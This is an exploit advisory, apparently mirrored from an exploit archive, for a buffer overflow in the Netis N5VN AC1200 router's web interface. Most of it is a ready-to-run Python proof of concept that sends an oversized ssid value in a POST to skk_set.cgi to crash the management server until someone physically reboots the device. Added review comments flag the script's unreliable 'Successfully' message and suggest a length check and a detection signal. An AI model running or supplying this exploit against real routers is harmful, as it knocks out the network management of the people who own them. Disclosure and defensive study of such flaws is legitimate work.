## https://sploitus.com/exploit?id=PACKETSTORM:223456
# Exploit Title: Netis N5VN AC1200 - Buffer Overflow DOS (Denial of Service)
    # Application: Netis N5VN AC1200 Router
    # Version: V1.0.1.1742
    # Date: 05/03/2024
    # Exploit Author: Van Lam Nguyen
    # Facebook: vanlam1412
    # Vendor Homepage: https://www.netis-systems.com/
    # Software Link: https://www.netis-systems.com/products/N5.html
    # Tested on: Windows
    # POC: https://github.com/vanlam2001/Netis-N5VN-AC1200-DOS
    
    Overview:
    ==================================================
    
    There exists a buffer overflow vulnerability in the Netis N5VN AC1200 router that allows an attacker to crash the web server running on the router by sending a crafted request. To restore the HTTP web server, a user must physically reboot the router.
    
    Proof of Concept:
    ==================================================
    
    import requests
    
    # Reproduction script for the advisory above: it issues a single form-encoded
    # POST to the router's skk_set.cgi handler with wireless-settings fields, one
    # of which (ssid) is far longer than any legitimate value.
    # Hard-coded LAN address of the device under test.
    url = 'http://192.168.1.254/cgi-bin/skk_set.cgi'
    
    # Authorization details are manipulated in the complete POST request (Based on your configuration)
    # NOTE(review): the Digest header below carries only username, realm and nonce
    # (no response digest). The advisory does not say whether the handler is
    # reachable without valid credentials -- confirm when assessing exposure.
    headers = {
        'Authorization': 'Digest username="thepro", realm="N5VN", nonce="U3VuIFNlcCAyMSAxNDo0MzoyOSAyMDI1"',
        'Accept': '*/*',
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin': 'http://192.168.1.254',
        'Referer': 'http://192.168.1.254/index.htm',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'en-US,en;q=0.9',
        'Connection': 'close'
    }
    
    # Form fields of a wireless base-settings save ('wl_base_set': 'save').
    data = {
        'wlanEnabled': '1',
        # NOTE(review): '1g' is not a valid hex octet; the advisory does not say
        # whether this malformed MAC address plays any part in the crash.
        'wlanMacAddr': 'bc:e2:04:1g:ea:b5',
        'wlanMode': '0',
        'wlanBand': '11',
        # 20,000 characters ('QQ==' repeated 5000 times). An 802.11 SSID is at
        # most 32 octets, so this is presumably the field that overruns the
        # buffer described in the overview -- the advisory does not name it.
        # Defensive takeaway: a POST to this endpoint whose ssid parameter is far
        # longer than a valid SSID is a usable detection signal, and the handler
        # should reject such lengths before copying the value.
        'ssid': 'QQ==' * 5000,
        'broadSSID': '1',
        'regDomain': '1',
        'channel': '0',
        'channelWidth': '0',
        'encrypt': '6',
        'wpaPskType': '3',
        'wpaPskFormat': '0',
        'wpaPsk': 'MqwdwasdsadDkqqw2321DQ==',
        'rp_encrypt': '0',
        'wl_base_set': 'save',
        'wl_idx': '6',
        'wscConfigured': '1',
        'app': 'base',
        'wl_link': '0'
    }
    
    # NOTE(review): the call sets no timeout, and the handler below labels *any*
    # exception as "Successfully" -- including unrelated failures such as the
    # host being unreachable. The printed message is therefore not reliable
    # evidence that the web server crashed; confirm by checking whether the
    # management interface still responds.
    try:
        response = requests.post(url, headers=headers, data=data)
        # Reached only if the server answered; prints the response body.
        print(response.text)
    except Exception as e:
        print(f"Successfully: {e}")